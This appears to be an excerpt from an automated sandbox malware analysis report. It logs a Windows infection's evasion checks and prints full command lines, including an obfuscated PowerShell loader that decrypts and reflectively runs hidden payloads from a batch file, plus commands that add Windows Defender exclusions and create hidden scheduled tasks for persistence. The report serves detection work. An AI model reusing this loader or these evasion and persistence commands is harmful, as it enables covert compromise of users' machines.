                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Powershell is started from unusual location (likely to bypass HIPS)
                    Source: c:\users\user\appdata\roaming\microsoft edge.exeKey value queried: Powershell behavior
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: powershell.exe, 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeMemory allocated: 2592CDE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeMemory allocated: 2592E600000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5553Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4328Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7524Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2081Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5690Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3990Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5943
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6407
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3353
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6804
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2755
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7315
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 801
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeWindow / User API: threadDelayed 5040
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeWindow / User API: threadDelayed 1651
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 5553 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 4328 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep count: 6407 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep count: 3353 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 6804 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 2755 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244Thread sleep count: 7315 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1028Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 801 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exe TID: 7208Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: wscript.exe, 00000006.00000002.1800236379.0000026053373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi64_7340.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi64_7828.amsi.csv, type: OTHER
                    Yara detected Powershell decrypt and execute
                    Source: Yara matchFile source: amsi64_7340.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi64_7828.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 2.2.powershell.exe.2751f95e588.1.raw.unpack, Program.csReference to suspicious API methods: VirtualProtect(intPtr, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zqhxkxfkvydhcognkrw5ypx3hzrh58mwnx9rrajxnma='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('y2k5eloh/96mwkcy8rovsg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gqtyr=new-object system.io.memorystream(,$param_var); $hyvqx=new-object system.io.memorystream; $qmylf=new-object system.io.compression.gzipstream($gqtyr, [io.compression.compressionmode]::decompress); $qmylf.copyto($hyvqx); $qmylf.dispose(); $gqtyr.dispose(); $hyvqx.dispose(); $hyvqx.toarray();}function execute_function($param_var,$param2_var){ $iwcxb=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rubak=$iwcxb.entrypoint; $rubak.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\desktop\startup_str_466.bat';$aednq=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\startup_str_466.bat').split([environment]::newline);foreach ($ccaqv in $aednq) { if ($ccaqv.startswith(':: ')) { $drdpt=$ccaqv.substring(3); break; }}$payloads_var=[string[]]$drdpt.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_533_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_533.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zqhxkxfkvydhcognkrw5ypx3hzrh58mwnx9rrajxnma='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('y2k5eloh/96mwkcy8rovsg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gqtyr=new-object system.io.memorystream(,$param_var); $hyvqx=new-object system.io.memorystream; $qmylf=new-object system.io.compression.gzipstream($gqtyr, [io.compression.compressionmode]::decompress); $qmylf.copyto($hyvqx); $qmylf.dispose(); $gqtyr.dispose(); $hyvqx.dispose(); $hyvqx.toarray();}function execute_function($param_var,$param2_var){ $iwcxb=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rubak=$iwcxb.entrypoint; $rubak.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_533.bat';$aednq=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_533.bat').split([environment]::newline);foreach ($ccaqv in $aednq) { if ($ccaqv.startswith(':: ')) { $drdpt=$ccaqv.substring(3); break; }}$payloads_var=[string[]]$drdpt.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('zqhxkxfkvydhcognkrw5ypx3hzrh58mwnx9rrajxnma='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('y2k5eloh/96mwkcy8rovsg=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gqtyr=new-object system.io.memorystream(,$param_var); $hyvqx=new-object system.io.memorystream; $qmylf=new-object system.io.compression.gzipstream($gqtyr, [io.compression.compressionmode]::decompress); $qmylf.copyto($hyvqx); $qmylf.dispose(); $gqtyr.dispose(); $hyvqx.dispose(); $hyvqx.toarray();}function execute_function($param_var,$param2_var){ $iwcxb=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rubak=$iwcxb.entrypoint; $rubak.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\desktop\startup_str_466.bat';$aednq=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\desktop\startup_str_466.bat').split([environment]::newline);foreach ($ccaqv in $aednq) { if ($ccaqv.startswith(':: ')) { $drdpt=$ccaqv.substring(3); break; }}$payloads_var=[string[]]$drdpt.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
